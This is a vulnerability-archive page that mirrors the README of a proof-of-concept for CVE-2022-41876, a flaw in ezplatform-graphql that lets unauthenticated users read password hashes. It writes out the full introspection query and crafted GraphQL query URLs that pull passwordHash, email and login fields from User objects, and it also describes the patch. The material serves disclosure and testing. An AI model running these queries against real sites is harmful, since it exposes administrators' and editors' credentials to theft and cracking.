Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1020 CNY

100%
Buy Us a Coffee

CVE-2022-41876 PoC — ezplatform-graphql GraphQL queries can expose password hashes

Source
https://github.com/Skileau/CVE-2022-41876
Associated Vulnerability
Title:ezplatform-graphql GraphQL queries can expose password hashes (CVE-2022-41876)
Description:ezplatform-graphql is a GraphQL server implementation for Ibexa DXP and Ibexa Open Source. Versions prior to 2.3.12 and 1.0.13 are subject to Insecure Storage of Sensitive Information. Unauthenticated GraphQL queries for user accounts can expose password hashes of users that have created or modified content, typically administrators and editors. This issue has been patched in versions 2.3.12, and 1.0.13 on the 1.X branch. Users unable to upgrade can remove the "passwordHash" entry from "src/bundle/Resources/config/graphql/User.types.yaml" in the GraphQL package, and other properties like hash type, email, login if you prefer.
Description
PoC for CVE-2022-41876
Readme
<div align="center">
  <img alt="ibexa logo" width="600" src="./logo/Ibexa_Logo.png">
  <br><br>
  <img alt="Python3.9" src="https://img.shields.io/badge/Python-3.9+-informational">
  <img alt="current version" src="https://img.shields.io/badge/linux-supported-success"><br>
  <a href="https://twitter.com/intent/follow?screen_name=Skilo" title="Follow"><img src="https://img.shields.io/twitter/follow/askilow?label=Skilo&style=social" alt="Twitter Skilo"></a>
  <a href="https://twitter.com/intent/follow?screen_name=TahiTi" title="Follow"><img src="https://img.shields.io/twitter/follow/0xTahiTi?label=TahiTi&style=social" alt="Twitter TahiTi"></a>
  <br><br>
</div>

# CVE-2022-41876 - eZ Platform user information disclosure

A vulnerability emerged in eZ Platform letting an unauthenticated user access every contributor password's hash.
This PoC enumerates every possible GraphQL path leading to a 'User' object, and then requests these paths to retrieve users' confidential information.

## Usage

```
python3 cve-2022-41876.py -h
```
```
usage: cve-2022-41876.py [-h] [-t] [-f FILE] url

CVE-2022-41876 POC

positional arguments:
  url                   Target URL (specify the graphql endpoint)

optional arguments:
  -h, --help            show this help message and exit
  -t, --thread          Number of threads
  -f FILE, --file FILE  Local path to introspect file
```

## Results

![image](./example/poc.gif)

## How it works ?

The different steps followed by this tool to exploit the CVE are:

### Retrieving introspect file

The first step to exploit this CVE is to get an introspect.json file.
One way to retrieve it is to query the graphql endpoint of the server with the following payload:

```
https://<your-url>/graphql?query={__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name%20description%20locations%20args{...InputValue}}}}fragment%20FullType%20on%20__Type{kind%20name%20description%20fields(includeDeprecated:true){name%20description%20args{...InputValue}type{...TypeRef}isDeprecated%20deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name%20description%20isDeprecated%20deprecationReason}possibleTypes{...TypeRef}}fragment%20InputValue%20on%20__InputValue{name%20description%20type{...TypeRef}defaultValue}fragment%20TypeRef%20on%20__Type{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name}}}}}}}}
```

### Finding paths to User objects

Then the json given by the server can be used to extract all paths to the 'User' objects with the tool [graphql-enum-path](https://gitlab.com/dee-see/graphql-path-enum) like this:

![image](./example/graphql-enum.png)

### Requesting found paths to get users' data

Finally, once all the paths are found, a specific payload must be crafted this way and sent to the server:
```
https://<your-url>/graphql?query={element1{element2{element3{...{id,name,login,passwordHash,email,enabled,maxLogin}}}}}
```
Where elements correspond to the texts between bracket in the result of graphql-enum-path _(note that a query must be done for each path)_.

So, with the graphql-enum-path example above, the first payload would be:
```
https://<your-url>/graphql?query={_repository{location{contentInfo{contentType{creator{id,name,login,passwordHash,email,enabled,maxLogin}}}}}}
```

If the server is vulnerable to this CVE, it will respond to that query with a json file containing its users' data.

## References

[Hacktricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/graphql)

[graphql-enum-path](https://gitlab.com/dee-see/graphql-path-enum)

## Credits

This PoC was created by [@Skilo](https://github.com/Skileau) and [@TahiTi](https://github.com/TahiTi)
File Snapshot

 [4.0K]  /data/pocs/2139d8a1d8864ee547079734d011d43fa6ee0e49
├── [7.7K]  cve-2022-41876.py
├── [4.0K]  example
│   ├── [145K]  graphql-enum.png
│   └── [115K]  poc.gif
├── [1.0K]  LICENSE
├── [4.0K]  logo
│   └── [ 55K]  Ibexa_Logo.png
├── [3.8K]  README.md
└── [  19]  requirements.txt

2 directories, 7 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →